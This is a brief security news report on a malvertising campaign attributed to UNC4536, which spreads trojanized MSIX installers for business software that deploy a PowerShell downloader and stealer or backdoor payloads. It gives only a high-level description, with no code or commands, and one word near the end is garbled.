Malvertising Campaign Targets Users Downloading Popular Business Software
Malvertising campaigns targeting users who seek popular business software, such as Trello, Brave, KeePass, Notion, Steam, and Zoom, deploy a trojanized MSIX installer. The threat actor UNC4536 is part of a Malware-as-a-Service operation that distributes several malware strains through covertly bundled legitimate software on fake websites mimicking the genuine hosting sites.
The installer executes a PowerShell script, NUMOZYLOD by Mandiant, which downloads secondary payloads discreetly in the background. Known as FakeBat, EugenLoader, and PaykLoader, this operation is attributed to UNC4536.
UNC4536 hosts these trojanized MSIX installers on fake websites designed to mimic legitimate hosting sites.
The attackers abuse MSIX features to gain initial access and evade detection, as it can execute scripts via the Package Support Framework (PSF).
In analyzed cases, Trello users are targeted by malvertising attacks redirecting them to fake websites.
Once victims start installing seemingly legitimate software, a secondary payload is downloaded along with additional packages hidden within the MSIX installer. The NUMOZYLOD PowerShell payload executes discreetly in the background.
The cybercriminals operate under the moniker “eugenfest” and are part of a Malware-as-a-Service (MaaS) operation, distributing malware such as IcedID, RedLine Stealer, Carbanak, Lumma Stealer, or Arechclient2.
In 2023, a NUMOZYLOD downloader was observed configured to retrieve the CARBANAK backdoor in trojanized installers hosted on fake download sites for KeePass.
Another campaign delivered heavily obfuscated NUMOZYLOD sample with Lumma Stealer payload.
A recent widespomed-stealing campaign lures victims via fake websites resembling Roblox FPS Unlocker, YouTube, VLC, or KeePass to distribute Trojans that install malicious Web browser extensions.